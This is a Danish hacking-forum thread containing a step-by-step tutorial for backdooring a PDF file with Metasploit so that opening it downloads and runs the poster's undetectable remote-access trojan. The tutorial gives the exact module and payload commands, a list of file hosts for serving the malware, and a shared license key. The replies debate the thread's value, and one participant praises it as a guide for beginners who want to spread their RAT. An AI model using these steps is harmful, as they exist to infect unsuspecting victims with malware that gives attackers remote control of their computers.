Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
Metasploit - Backdoor en PDF fil med din server/rat
12-10-2013, 13:05 (Denne besked var sidst ændret: 13-10-2013, 11:44 af Juicy.)
#1
Metasploit - Backdoor en PDF fil med din server/rat
Credits til http://anonymouseverywhere.blogspot.dk/ , jeg har bare oversat guiden til Dansk!


Backfoor en PDF fil med din RAT

Inden du stater, så hav en PDF fil og din fud server/rat liggende på dit skrivebord i en mappe (forklaring i slutningen af tråd)

Download Metasploit direkte fra deres egen side her:
http://www.rapid7.com/products/metasploit/download.jsp

Gratis key til Metasploit 32bit: Q2ND-3CHX-WGCL-EPY9

Now let me explain how this exploit works. This is just a basic exploit that will open drops of a reverse_tcp meterpreter session on the victim when it's executed. Also, this exploit works while the PDF is open until it is migrated to another process.

Hvad du behøver for at fuldføre dette:
En PDF fil (kan fx være en guide eller ebook eller lign)
En FUD server (din RAT, husk det skal være 100% FUD)
Og Metasploit



Husk altid at tjek om din version af metasploit er up to date!
Og husk aldrig at skriv store bogstaver i metasploit (A,B C osv, kun a,b,c). Ellers vil der kommer errors, så bare følg tutorialen og skriv som jeg skriver.

Note:
Husk at have en PDF fil klar, og din server/rat uploaded til en filehost som supporter direkte links.

Nogle eksempler:
Kode:
http://ge.tt/  - MIN EGEN FAVORIT!

http://scan.psomasweb.org/
http://sharesend.com/
http://www.directlink.tv
http://www.filehold.net
http://www.dlandexe.com
http://www.wss-coding.com/upload
http://www.botz.in
http://kiwi6.com/
http://zippyshare.com/
http://drop.st/
http://filetolink.com/
http://freewayhost.net/
http://largedocument.com/
http://rghost.net/
http://dox.abv.bg/files/share


Trin 1
Først skal vi have infected vores PDF fil, før at gøre dette skal du åbne Metasploit's Console og skriv følgende:

PHP Code:
use exploit/windows/fileformat/adobe_pdf_embedded_exe

Trin 2
Efter du har skrevet den command, skal du strukturer filerne, ved at skrive følgende:

PHP Code:
set payload windows/download_exec

Trin 3
Nu skal du finde din PDF fils placering, og skrive følgende command:
Dette er bare et eksempel: C:/Users/Owner/Desktop/example.pdf

PHP Code:
set INFILENAME C:/Users/Owner/Desktop/example.pdf


Trin 4
Nu skal du bruge det direkte download link til din FUD server/rat, skriv følgende command:


PHP Code:
set url www.downloadminfil.nu/jegvilinfectedig

Nu du færdig!


Metasploirt vil automatisk gemme den færdig backdoored fil samme sted som du havde placeret din PDF fil. (Derfor jeg sagde det var nemmest hvis du lagde alle filerne på dit skrivebord i en mappe inden start)
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
12-10-2013, 13:34
#2
RE: Metasploit - Backdoor en PDF fil med din server/rat
Stop nu bare.. Den exploit er 6 måneder public overalt.
Find alle beskeder fra denne bruger
Citer denne besked i et svar
12-10-2013, 16:39 (Denne besked var sidst ændret: 12-10-2013, 16:39 af Doctor Blue.)
#3
RE: Metasploit - Backdoor en PDF fil med din server/rat
(12-10-2013, 13:34)sabu Skrev: Stop nu bare.. Den exploit er 6 måneder public overalt.

Men den virker fint, så derfor er det stadig en relevant tråd.
Du behøver ikke at kritisere alt og alle.
Mangler du hjælp?
Regler |  E-mail (PGP)
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
12-10-2013, 17:48
#4
RE: Metasploit - Backdoor en PDF fil med din server/rat
Man kan også bruge "evil_pdf.py" til at smide noget infected i en PDF fil. Det er et script som følger med Back Track. :)
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
12-10-2013, 19:33
#5
RE: Metasploit - Backdoor en PDF fil med din server/rat
(12-10-2013, 16:39)Doctor Blue Skrev: Men den virker fint, så derfor er det stadig en relevant tråd.
Du behøver ikke at kritisere alt og alle.

mangler vi så en tråd til samtlige exploits..
Find alle beskeder fra denne bruger
Citer denne besked i et svar
12-10-2013, 21:46
#6
RE: Metasploit - Backdoor en PDF fil med din server/rat
(12-10-2013, 19:33)sabu Skrev: mangler vi så en tråd til samtlige exploits..

Nej, denne tråd er interessant fordi det er en nem og brugbar vejledning for begyndere der gerne vil sprede deres RAT.
Idéen er jo ikke at dokumentere en exploit, men at lære folk hvordan de virker og hvad de kan.
Mangler du hjælp?
Regler |  E-mail (PGP)
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
12-10-2013, 23:42
#7
RE: Metasploit - Backdoor en PDF fil med din server/rat
Opdatere tråden lidt imorgen, med billeder og download links osv: D
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
13-10-2013, 10:41
#8
RE: Metasploit - Backdoor en PDF fil med din server/rat
(12-10-2013, 21:46)Doctor Blue Skrev: Nej, denne tråd er interessant fordi det er en nem og brugbar vejledning for begyndere der gerne vil sprede deres RAT.
Idéen er jo ikke at dokumentere en exploit, men at lære folk hvordan de virker og hvad de kan.

Det har intet med hacking at gøre.

Hvad med en guide til frameworket i stedet?
Find alle beskeder fra denne bruger
Citer denne besked i et svar
13-10-2013, 11:02
#9
RE: Metasploit - Backdoor en PDF fil med din server/rat
(13-10-2013, 10:41)sabu Skrev: Det har intet med hacking at gøre.

Hvad med en guide til frameworket i stedet?

https://www.shellsec.pw/showthread.php?tid=766
Det har vi allerede, men den er ikke så generel kan man sige.
Lad nu brugerne lave guides om det de har lyst til.
Mangler du hjælp?
Regler |  E-mail (PGP)
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
13-10-2013, 20:12
#10
RE: Metasploit - Backdoor en PDF fil med din server/rat
Tror jeg laver en YT vid når jeg lige får min stationær op og køre igen eller for instaleret metasploit på min bærbar :D
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)